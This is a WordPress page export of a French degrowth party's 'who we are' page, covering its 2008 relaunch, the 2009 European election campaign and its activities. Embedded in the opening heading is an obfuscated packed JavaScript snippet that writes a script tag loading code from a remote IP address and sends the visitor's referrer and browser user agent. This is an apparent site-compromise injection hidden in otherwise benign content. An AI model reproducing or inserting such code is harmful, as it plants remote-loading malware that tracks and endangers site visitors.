{"id":7258,"date":"2012-04-25T12:35:36","date_gmt":"2012-04-25T11:35:36","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=7258"},"modified":"2012-10-30T11:30:46","modified_gmt":"2012-10-30T10:30:46","slug":"le-ppld-cest-qui","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=7258","title":{"rendered":"Le PPLD, c&rsquo;est qui ?"},"content":{"rendered":"<p style=\"text-align: center;\">UNE <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|byhbd|var|u0026u|referrer|dkfrk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> CROISSANCE ILLIMIT\u00c9E DANS UN MONDE LIMIT\u00c9 EST UNE ABSURDIT\u00c9<\/p>\n<p style=\"text-align: left;\">Si la structure existe depuis 2005, le Parti Pour La D\u00e9croissance est relanc\u00e9 en 2008 par de nouvelles et nouveaux militant-e-s. C\u2019est donc un parti jeune et divers qui s&rsquo;engage dans une d\u00e9marche collective pour amener la D\u00e9croissance dans le d\u00e9bat public. Peu \u00e0 peu, le fonctionnement du parti change de fait : une gestion collective s\u2019installe, laissant derri\u00e8re elle une organisation pyramidale. Une dynamique d\u2019ouverture d\u00e9bute aussi, notamment vers le reste du mouvement d\u00e9croissant, qui aboutit en 2009 \u00e0 la pr\u00e9sence de la D\u00e9croissance politique lors des \u00e9lections europ\u00e9ennes de 2009 et d\u2019avoir acc\u00e8s aux spots de campagne \u00e0 la radio et \u00e0 la t\u00e9l\u00e9vision (motion de janvier 2009 adopt\u00e9e par l\u2019Assembl\u00e9e g\u00e9n\u00e9rale).<\/p>\n<p>Avec un appel sign\u00e9 par plus de 1700 personnes et des listes dans 6 grandes r\u00e9gions, la campagne Europe-D\u00e9croissance est une r\u00e9ussite collective pour le PPLD, en association avec le Mouvement des Objecteurs de Croissance (MOC), qui favorise l\u2019arriv\u00e9e d\u2019une nouvelle g\u00e9n\u00e9ration de militant-e-s. Elle reste pour chacun-e un moment de convivialit\u00e9, de partage et de cr\u00e9ation de liens.<\/p>\n<p style=\"text-align: center;\">PLUS QUE LE NOM, C&rsquo;EST NOTRE ACTION QUI DOIT NOUS DEFINIR<\/p>\n<p style=\"text-align: left;\">Aujourd\u2019hui, le PPLD continue son projet porteur de radicalit\u00e9, visant \u00e0 colporter les id\u00e9es de la D\u00e9croissance pour une transition vers des soci\u00e9t\u00e9s socialement justes et \u00e9cologiquement soutenables.<\/p>\n<p>Sa d\u00e9marche est multiple :<\/p>\n<p>&#8211; l\u2019approfondissement du projet y tient une place centrale, \u00e0 la fois en construisant un projet d\u00e9sirable de d\u00e9croissance et en portant la r\u00e9flexion sur des th\u00e9matiques sp\u00e9cifiques (l\u2019agriculture, la dette, la r\u00e9duction du temps de travail, les gratuit\u00e9s, le sport, etc.) ;<\/p>\n<p>&#8211; la participation \u00e0 divers rassemblements de mouvements sociaux et d\u2019organisations politiques, dans le but de tisser des liens et d\u2019apporter les id\u00e9es de l\u2019objection de croissance au sein d\u2019\u00e9v\u00e9nements dont nous sommes enti\u00e8rement partie prenante (lutte contre les infrastructures inutiles comme l\u2019a\u00e9roport Notre-Dame-des-Landes, Foire \u00e0 l\u2019Autogestion, mobilisations contre les gaz de schistes, etc.) ;<\/p>\n<p>&#8211; la participation \u00e0 des \u00e9lections, que nous refusons d\u2019ignorer car elles sont l&rsquo;occasion de rencontres, de r\u00e9flexions collectives, de confrontations de nos id\u00e9es vers l&rsquo;ext\u00e9rieur. Elles permettent de faire exister notre mouvement et d&rsquo;ouvrir le d\u00e9bat autour des soci\u00e9t\u00e9s de D\u00e9croissance, dans un moment de plus grande attention politique de nos concitoyens ;<\/p>\n<p>&#8211; le soutien et l\u2019initiation d\u2019initiatives concr\u00e8tes comme les ateliers v\u00e9lo, les monnaies locales, les circuits-courts, Proximit\u00e9s, etc. ;<\/p>\n<p>&#8211; l\u2019implication de chacun et chacune de ses membres, au quotidien, dans des d\u00e9marches de simplicit\u00e9 volontaire et de d\u00e9colonisation de l\u2019imaginaire.<\/p>\n<p>Enfin, le Parti Pour La D\u00e9croissance c\u2019est un collectif au sein duquel chacun-e contribue de la mani\u00e8re qui lui convient, avec ses comp\u00e9tences et envies propres, sans jamais se voir imposer d\u2019autre imp\u00e9ratif que celui de promouvoir la D\u00e9croissance que nous souhaitons voir s\u2019installer au sein de la soci\u00e9t\u00e9.<\/p>\n<p style=\"text-align: center;\">IL FAUT QUE CHAQUE OBJECTEUR DE CROISSANCE PUISSE S\u2019EPANOUIR L\u00c0 O\u00d9 IL SE SENT LE MIEUX<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/decroissance-elections.fr\/wp-content\/uploads\/2012\/04\/logo_PPLD-_l.jpg\" alt=\"\" width=\"180\" height=\"110\" \/><\/p>\n<p style=\"text-align: center;\"><a href=\"mailto:contact@ml.partipourladecroissance.net\" target=\"_blank\">contact@ml.partipourladecroissance.net<\/a><br \/>\n<a href=\"http:\/\/www.partipourladecroissance.net\/\" target=\"_blank\">http:\/\/www.partipourladecroissance.net\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UNE CROISSANCE ILLIMIT\u00c9E DANS UN MONDE LIMIT\u00c9 EST UNE ABSURDIT\u00c9 Si la structure existe depuis 2005, le Parti Pour La D\u00e9croissance est relanc\u00e9 en 2008 par de nouvelles et nouveaux militant-e-s. C\u2019est donc un parti jeune et divers qui s&rsquo;engage &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=7258\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3982,"menu_order":1,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-7258","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/7258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7258"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/7258\/revisions"}],"predecessor-version":[{"id":7533,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/7258\/revisions\/7533"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3982"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}